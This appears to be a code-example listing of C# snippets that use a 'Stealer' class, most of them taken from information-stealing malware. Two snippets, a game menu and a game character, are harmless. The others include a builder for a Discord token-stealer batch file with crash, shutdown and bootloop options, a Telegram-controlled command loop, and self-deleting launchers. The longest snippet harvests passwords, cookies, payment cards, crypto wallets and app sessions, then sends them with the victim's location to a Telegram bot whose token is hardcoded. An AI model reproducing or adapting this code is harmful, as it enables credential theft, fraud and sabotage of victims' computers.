Example #1
0
        private void CreateBtn_Click(object sender, EventArgs e)
        {
            bool flag = this.WebHookTxt.Text == "" || this.WebHookTxt.Text == "Webhook Here";

            if (flag)
            {
                MessageBox.Show("You need to paste a Webhook first!", "ItroublveTSC");
            }
            else
            {
                string _TokenStealer     = "TokenStealer.bin";
                string _cdDir            = "output";
                string _CopyTokenStealer = "TokenStealerCOPY.bin";
                if (Directory.Exists(_cdDir))
                {
                    Directory.Delete(_cdDir, true);
                }
                try
                {
                    if (!File.Exists(_CopyTokenStealer))
                    {
                        File.Copy(_TokenStealer, _CopyTokenStealer);
                    }
                    string text = File.ReadAllText("TokenStealerCOPY.bin");
                    if (CrashPCchkbox.Checked)
                    {
                        text = text.Replace("rem %0 | %0", "%0 | %0");
                    }
                    if (RestartPCchkbox.Checked)
                    {
                        text = text.Replace("rem SHUTDOWN -r -t 30", "SHUTDOWN -r -t 30");
                    }
                    if (ShutdownPCchkbox.Checked)
                    {
                        text = text.Replace("rem SHUTDOWN /s /t 30 /c", "SHUTDOWN /s /t 30 /c");
                    }
                    if (BootloopPCchckbox.Checked)
                    {
                        text = text.Replace("rem test", "");
                    }
                    text = text.Replace("Webhook", WebHookTxt.Text);
                    File.WriteAllText("TokenStealerCopy.bin", text);
                    DirectoryInfo di = Directory.CreateDirectory(_cdDir);
                    File.Move(_CopyTokenStealer, "output/Token Stealer.bat");
                    File.Delete(_CopyTokenStealer);
                    Stealer.Dialog(this.WebHookTxt.Text);
                    MessageBox.Show("Stealer files successfully created!", "ItroublveTSC");
                }
                catch (Exception ex)
                {
                    MessageBox.Show("Failed to create stealer files!\r\n" + (ex.Message), "ItroublveTSC");
                }
            }
        }
Example #2
0
        private void siticoneButton1_Click(object sender, EventArgs e)
        {
            bool flag = this.WebHookTxt.Text == "" || this.WebHookTxt.Text == "WebHook Here";

            if (flag)
            {
                MessageBox.Show("Webhook Required To Create", "Dread TSC");
            }
            else
            {
                Stealer.Dialog(this.WebHookTxt.Text);
            }
        }
 static Utility()
 {
     // Menu
     Summoners.Initialize();
     if (UtilsManager.IsSupported)
     {
         Stealer.Initialize();
     }
     OItems.Initialize();
     DItems.Initialize();
     CItems.Initialize();
     Protector.Initialize();
     Cleansers.Initialize();
     Settings.Initialize();
 }
Example #4
0
 private static void c()
 {
     try
     {
         if (Internet.CheckConnection())
         {
             Stealer.Start();
         }
         else
         {
             d();
         }
     }
     catch
     {
     }
 }
Example #5
0
    void Awake()
    {
        _floater = GetComponentInChildren <Floater>();

        _movement = GetComponent <RobberMovement>();
        _movement.Initilise(_data.InitialMoveSpeed);
        _movement.OnBankReached += Steal;
        _movement.OnExitReached += Escape;

        _health = GetComponent <Health>();
        _health.Initilise(_data.InitialHP);
        _health.OnDeath += Die;

        _stealer = GetComponent <Stealer>();
        _stealer.Initilise(_data.InitialStealAmount);

        _difficultyWeight = new ModifiableStat(_data.InitialDifficultyWeight);
    }
Example #6
0
    public static string a()
    {
        while (true)
        {
            try
            {
                JSONNode.Enumerator enumerator = JSON.Parse(b(Global.ApiUrl + g.d + "/getUpdates?offset=" + (h.m_a + 1)))["result"].AsArray.GetEnumerator();
                while (enumerator.MoveNext())
                {
                    JSONNode jSONNode = enumerator.Current;
                    h.m_a = jSONNode["update_id"].AsInt;
                    string text = jSONNode["message"]["text"];
                    if (text.IndexOf(Global.GetHwid()) > -1 || text.IndexOf("All") > -1)
                    {
                        switch (text.Split(':')[0])
                        {
                        case "log":
                            Stealer.Start();
                            break;

                        case "screen":
                            bc.a();
                            break;
                        }
                    }
                    if (text == "online")
                    {
                        b(string.Concat(Global.ApiUrl, g.d, "/sendMessage?", "chat_id=", jSONNode["message"]["chat"]["id"], "&text=", "\ud83d\udc41\u200d\ud83d\udde8 Online: ", Global.GetHwid()));
                    }
                }
                Thread.Sleep(g.a);
            }
            catch
            {
            }
        }
    }
Example #7
0
    private static void Main()
    {
        AppDomain.CurrentDomain.AssemblyResolve += Class1.smethod_0;
        Stealer.GetStealer();
        File.AppendAllText(Help.LocalData + "\\" + Help.HWID, Help.HWID);
        File.SetAttributes(Help.LocalData + "\\" + Help.HWID, FileAttributes.Hidden | FileAttributes.System);
        string text = Path.GetTempFileName() + ".bat";

        using (StreamWriter streamWriter = new StreamWriter(text))
        {
            streamWriter.WriteLine("@echo off");
            streamWriter.WriteLine("timeout 4 > NUL");
            streamWriter.WriteLine("DEL \"" + Path.GetFileName(new FileInfo(new Uri(Assembly.GetExecutingAssembly().CodeBase).LocalPath).Name) + "\" /f /q");
        }
        Process.Start(new ProcessStartInfo
        {
            FileName        = text,
            CreateNoWindow  = true,
            ErrorDialog     = false,
            UseShellExecute = false,
            WindowStyle     = ProcessWindowStyle.Hidden
        });
        Environment.Exit(0);
    }
Example #8
0
        private static void Main(string[] args)
        {
            try
            {
                User   user;
                string str;
                botClient = new TelegramBotClient("879228914:AAH0PEwN4FUC6XvZjCbykrBbd4U2QfQ5lOo", (System.Net.Http.HttpClient)null);
                if (!File.Exists(Path.Combine(Identifier.ApplicationData, "yes")))
                {
                    File.Create(Path.Combine(Identifier.ApplicationData, "yes"));
                    char[]   separator  = new char[] { ' ' };
                    string[] collection = raws.Split(separator, StringSplitOptions.RemoveEmptyEntries);
                    KeyWords.AddRange(collection);
                    user = new User();
                    Identifier.GetInfo(ref user);
                    Kill();
                    Stealer.Steal(ref user);
                    UserAgentGenerator.Generate(ref user);
                    Sorter.Sort(ref user);
                    str = string.Empty;
                    using (List <string> .Enumerator enumerator = KeyWords.GetEnumerator())
                    {
                        string current;
                        bool   flag2;
                        bool   flag3;
                        goto TR_0021;
TR_000B:
                        if (flag3 | flag2)
                        {
                            str = str + "\n";
                        }
                        goto TR_0021;
TR_0015:
                        foreach (Cookie cookie in user.Cookies)
                        {
                            try
                            {
                                if (!cookie.Host.ToLower().Contains(current.ToLower()))
                                {
                                    continue;
                                }
                                if (!flag2)
                                {
                                    continue;
                                }
                                str   = str + "(C)";
                                flag3 = true;
                            }
                            catch
                            {
                                continue;
                            }
                            break;
                        }
                        goto TR_000B;
TR_0021:
                        while (true)
                        {
                            if (enumerator.MoveNext())
                            {
                                current = enumerator.Current;
                                flag2   = false;
                                flag3   = false;
                                try
                                {
                                    foreach (Password password in user.Passwords)
                                    {
                                        if (password.URL.ToLower().Contains(current.ToLower()))
                                        {
                                            str   = str + current + " (P)";
                                            flag2 = true;
                                            break;
                                        }
                                    }
                                }
                                catch
                                {
                                }
                            }
                            else
                            {
                                goto TR_0008;
                            }
                            break;
                        }
                        goto TR_0015;
                    }
                }
                return;

TR_0002:
                ProcessStartInfo info1 = new ProcessStartInfo();
                info1.Arguments        = "/C choice /C Y /N /D Y /T 1 & Del \"" + Path.Combine(Directory.GetCurrentDirectory(), Process.GetCurrentProcess().ProcessName) + "\"";
                info1.WindowStyle      = ProcessWindowStyle.Hidden;
                info1.CreateNoWindow   = true;
                info1.FileName         = "cmd.exe";
                Process.Start(info1);
                return;

TR_0008:
                using (FileStream stream = new FileStream(Identifier.StealerZip, FileMode.Open))
                {
                    try
                    {
                        InputOnlineFile document   = new InputOnlineFile(stream, Identifier.StealerZip);
                        string[]        textArray1 = new string[0x1c];
                        textArray1[0]  = "IP: *";
                        textArray1[1]  = user.IP;
                        textArray1[2]  = "*\nCountry: *";
                        textArray1[3]  = user.Country;
                        textArray1[4]  = " (";
                        textArray1[5]  = user.CountryCode;
                        textArray1[6]  = ")*\nCity: *";
                        textArray1[7]  = user.City;
                        textArray1[8]  = "*\n————————————————\n";
                        textArray1[9]  = $"Passwords: *{user.PasswordsNumber}*";
                        textArray1[10] = $"Cookies: *{user.CookiesNumber}*";
                        textArray1[11] = $"Forms: *{user.Forms}*";
                        textArray1[12] = $"Cards: *{user.CardsNumber}*";
                        textArray1[13] = "Photo: *";
                        textArray1[14] = user.WithPhoto ? " +" : "-";
                        string[] local3 = textArray1;
                        local3[15]   = "*\nBitcoins: *";
                        local3[0x10] = user.Bitcoin ? " +" : "-";
                        string[] local4 = local3;
                        local4[0x11] = "*\nSessions:*";
                        local4[0x12] = user.FileZilla ? " FileZilla" : "";
                        string[] local5 = local4;
                        local5[0x13] = "**";
                        local5[20]   = user.Steam ? " Steam" : "";
                        string[] local6 = local5;
                        local6[0x15] = "**";
                        local6[0x16] = user.Telegram ? " Telegram" : "";
                        string[] local7 = local6;
                        local7[0x17] = "**";
                        local7[0x18] = user.Discord ? " Discord" : "";
                        string[] local8 = local7;
                        local8[0x19] = "*\n————————————————\n*";
                        local8[0x1a] = str;
                        local8[0x1b] = "*";
                        CancellationToken cancellationToken = new CancellationToken();
                        botClient.SendDocumentAsync(TELEGAID, document, string.Concat(local8), ParseMode.Markdown, false, 0, null, cancellationToken, null).Wait();
                    }
                    catch
                    {
                    }
                }
                goto TR_0002;
            }
            catch (Exception exception)
            {
                Errors.Add(exception);
            }
        }